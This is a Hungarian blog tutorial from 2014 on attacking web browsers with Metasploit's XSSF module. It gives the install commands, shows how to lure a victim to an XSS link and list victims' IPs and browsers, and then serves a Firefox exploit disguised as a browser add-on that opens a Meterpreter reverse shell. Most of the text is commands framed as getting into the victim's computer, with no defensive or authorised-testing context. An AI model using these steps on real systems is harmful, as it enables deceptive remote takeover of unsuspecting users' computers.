2014. január 4., szombat

Védtelen böngészők -2-

A védtelen böngészők hibáinak kihasználása lesz a téma. Vagyis, hogy hogyan szerezzünk információkat, hogyan jussunk az áldozat számítógépbe. A Metasploittal fogunk dolgozni de a modult külön kell telepíteni amit használni fogunk. A modul neve: XSSF
Letöltés: https://code.google.com/p/xssf/downloads/list
Először is fel kell telepíteni írjuk be a következő parancsokat:
cd /opt/metasploit/apps/pro/msf3
svn export http://xssf.googlecode.com/svn/trunk/ ./ --force
Aztán már lehet is használni :)
Írjuk be, hogy msfconsole és ha bejött a konzol akkor töltsük be a modult így: load xssf be fogja tölteni a modult most írjuk be,hogy: xssf_urls
és ki fognak jönni az url-ek amit az áldozatnak kell adni és a felület amin tudjuk kezelni az XSSF-et.
Van itt generic xss támadás is de szerintem a teszt oldal is megteszi elsőre. :)
Szóval először az áldozatnak oda kell adni az url-t,hogy nézze meg és aztán bumm be is juthatunk a gépbe. Ha már megnézte akkor meg lehet nézni a listát, hogy kik és hányan nézték meg az xss oldalt. Az xssf_victims szépen listázza nekünk,az IP címet,aktivitást,intervallumot,böngészőt,böngésző verziót.
De van még nekünk egy GUI kezelőfelület ahol meg tudjuk nézni a statisztikát a logokat stb :)
http://szerver:port/gui.html?guipage=main
Így néz ki:
Na akkor vágjunk bele :)
Mint látjátok a képen is a böngésző Firefox úgyhogy keresek hozzá exploitot. Beírtam metasploit konzolba, hogy search firefox találtam is egy aranyos kis exploitot ami úgy támad,hogy böngésző kiegészítőnek alcázza magát és ha az áldozat feltelepíti a "kiegészítőt" akkor bent vagyunk. Adjuk meg a következő paramétereket:
use multi/browser/firefox_xpi_bootstrapped_addon
set payload windows/meterpreter/reverse_tcp
Egyébként a payloadok rendszer függők vagyis ez a windows payload nem fog linuxal működni, de az exploit amit most használok működik OS X-el is. :)
set lhost ip címed
set uripath /
Az uripath az hogy mi legyen az ip cím után mondjuk megadjuk uripathnak,hogy c akkor így kell beírni a böngészőbe http://ip/c ha nem állítasz be mellé srvhostot akkor az uripathos módszer marad vagyis http://ip/amitmegadsz. Ha beállítod az srvhostnak a saját ip címed akkor nem kell foglalkozni az uripathal :)
set srvhost ip címed
exploit
Egyébként a local portot is állíthatjuk a set lport paranccsal és az srvportot is a set srvport paranccsal.
Ha beírtuk,hogy exploit akkor ha minden jó fut a mi kis szerverünk. :)
És most írjuk be hogy jobs és látni fogjuk, hogy hány exploit fut éppen.
Meg kell adnunk az xssf-nek hogy: xssf_exploit célpont futó exploit szám
Példa:
xssf_exploit 1 0
Ezt fogja látni az áldozat:
Míg nem teszi fel a kiegészítőt ezt látjuk:
Ha feltelepítette a kiegészítőt akkor mi bent is vagyunk..
Nézzük meg hogy bent vagyunk e. Írjuk be hogy: sessions -l
Ha van aktív session akkor sessions -i session szám
Példa:
sessions -i 1
És bent is vagyunk. :)
Ennyi lenne remélem érthető volt kösz,hogy elolvastad :)